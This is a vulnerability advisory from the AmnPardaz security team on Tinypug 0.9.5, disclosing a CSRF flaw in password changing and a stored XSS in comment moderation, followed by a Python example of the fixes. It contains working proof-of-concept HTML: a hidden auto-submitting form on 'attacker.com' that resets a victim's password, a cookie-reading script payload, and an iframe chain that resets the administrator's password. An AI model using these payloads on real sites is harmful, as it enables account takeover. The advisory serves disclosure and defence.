Tinypug Multiple Vulnerabilities
##########################www.BugReport.ir########################################
#
# AmnPardaz Security Research Team
#
# Title:              Tinypug Multiple Vulnerabilities
# Vendor:             http://platformassociates.com/
# (project hosted at http://code.google.com/p/tinypug/)
# Vulnerable Version: 0.9.5 (and prior versions)
# Exploitation:       Remote with browser
# Fix:                N/A
###################################################################################
####################
- Description:
####################
Tinypug is a system for building portals that enable innovation
communities and customer inquiry. The idea is to go beyond one-off
statistical surveys (which tend only to verify an existing paradigm)
to foster real collaboration, scalable two-way communication, and
anecdotal feedback from users/customers.
####################
- Vulnerability:
####################
+--> CSRF (Cross-Site Request Forgery)
	The password changing page is vulnerable to CSRF. It accepts the new
	password without requiring the current password or an anti-CSRF token,
	so a request forged from another site changes the password of the
	logged-in victim. For details of this process see the "Exploits/PoCs"
	section.
+--> Stored XSS Vulnerability
	The comment page is vulnerable to stored XSS. Comments are published
	only after administrator confirmation, but the comment body is rendered
	unescaped to the administrator on the approval page, so the payload
	runs in the administrator's browser before any approval is given. This
	XSS can therefore be used in conjunction with the more serious hole
	(the CSRF) to change the administrator's password.
####################
- Exploits/PoCs:
####################
+--> Exploiting The CSRF Vulnerability:
	As with any CSRF attack, the victim must be logged in at the target
	site, "victim.com", and visit the attacker's site, "attacker.com".
	The browser attaches the victim's session cookie to the cross-site
	POST, and the page asks only for the new password twice, so the
	attacker can change the victim's password (for example to
	"the-new-password") by serving the following code on attacker.com:
	<div>
		<iframe id="if1" name="if1" style="display:none">
			This frame is invisible!!
		</iframe>
		<form action="http://victim.com/tinypug-0.9.5/profiles/change_password"
				method="post" id="the_form" style="display:none" target="if1">
			<input type="password" name="password" value="the-new-password" />
			<input type="password" name="password2" value="the-new-password" />
			<input type="submit" value="Change Password" />
		</form>
		<script type="text/javascript">
		//<![CDATA[
			// Auto-submit the hidden form into the hidden frame so the
			// victim never sees the request or its response.
			var $form = document.getElementById('the_form');
			$form.submit();
		//]]>
		</script>
	</div>
+--> Exploiting The Stored XSS Vulnerability:
	Simply go to the comment page of a post (for example
	"http://victim.com/tinypug-0.9.5/stories/view/welcome#comments")
	and embed any desired XSS vector, such as
	<script>alert(document.cookie)</script>
	Be aware that comments are reviewed by administrators before
	publishing, so the payload reaches ordinary readers only if it is
	approved; it reaches the reviewing administrator regardless.
+--> Changing Administrator Password by combining above Vulnerabilities:
	Using the stored XSS, post a comment so that the administrator's
	browser renders the following code on the approval page:
	My comment !!! <iframe id="f2" name="f2" src="http://attacker.com/csrf.php" style="display:none"></iframe>
	Then, whether he/she approves the comment or not :), the hidden frame
	loads "http://attacker.com/csrf.php" (the CSRF page shown above) with
	the administrator's session, and his/her password is changed to
	"the-new-password".
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_67.htm
####################
- Solution:
####################
For the CSRF vulnerability, the password changing page must be changed to
ask for the old password, too, so that a forged request that does not know
the current password fails. A per-session anti-CSRF token checked on the
POST is the standard complement: it rejects the forged request itself
rather than only its effect.
For the XSS vulnerability, the comments shown on the approval page must be
rendered inert. Wrapping each comment in an <xmp> tag does this, but note
that <xmp> is obsolete and a comment containing the string "</xmp>"
terminates it, so HTML-escaping the comment body (htmlspecialchars or its
equivalent) before output is the safer fix.
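As an added illustration of both fixes, not Tinypug's own code, the
following Python implements a password-change handler that checks an
anti-CSRF token and the current password, and an escaping routine for the
moderation page. The session, form and user-store structures, the field
names "csrf_token" and "old_password", and the constructed sample data are
assumptions made for the example.

```python
import hashlib
import hmac
import html
import os
import secrets

PBKDF2_ROUNDS = 200_000


def hash_password(password: str, salt: bytes = b"") -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as "<salt hex>$<derived key hex>"."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + dk.hex()


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison of the candidate against the stored hash."""
    salt_hex, dk_hex = stored.split("$", 1)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    return hmac.compare_digest(dk.hex(), dk_hex)


def issue_csrf_token(session: dict) -> str:
    """Mint a fresh token into the server-side session and return it for the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def change_password(session: dict, form: dict, users: dict) -> tuple:
    """Hardened handler. `session` is the requester's server-side session,
    `form` the POST fields, `users` the user store (assumed structures)."""
    # 1. Anti-CSRF token: a form served from attacker.com cannot read the
    #    victim's session, so it cannot supply the right value.
    expected = session.get("csrf_token", "")
    supplied = str(form.get("csrf_token", ""))
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "invalid CSRF token"
    user = users.get(session.get("user"))
    if user is None:
        return False, "not logged in"
    # 2. Current password (the advisory's fix): even a request that somehow
    #    carries a valid token fails without the secret the attacker lacks.
    if not verify_password(form.get("old_password", ""), user["password_hash"]):
        return False, "old password incorrect"
    new = form.get("password", "")
    if len(new) < 8 or new != form.get("password2"):
        return False, "new passwords do not match or are too short"
    user["password_hash"] = hash_password(new)
    # Rotate the token so a captured request cannot be replayed.
    issue_csrf_token(session)
    return True, "password changed"


def render_pending_comment(comment: str) -> str:
    """Escape a comment for the moderation page. Unlike wrapping it in <xmp>,
    this cannot be broken out of by a closing tag inside the comment."""
    return '<pre class="pending-comment">' + html.escape(comment, quote=True) + "</pre>"


if __name__ == "__main__":
    users = {"admin": {"password_hash": hash_password("old-secret")}}
    session = {"user": "admin"}
    token = issue_csrf_token(session)
    # Constructed: the fields the PoC above sends (no token, no old password).
    forged = {"password": "the-new-password", "password2": "the-new-password"}
    print(change_password(session, forged, users))
    legit = {"csrf_token": token, "old_password": "old-secret",
             "password": "the-new-password", "password2": "the-new-password"}
    print(change_password(session, legit, users))
    print(render_pending_comment("<script>alert(document.cookie)</script>"))
```

The forged request from the PoC fails at the token check before the
password logic is reached; a request that somehow carries the token still
fails without the current password. Rotating the token after a successful
change means a captured legitimate request cannot be replayed either.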
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com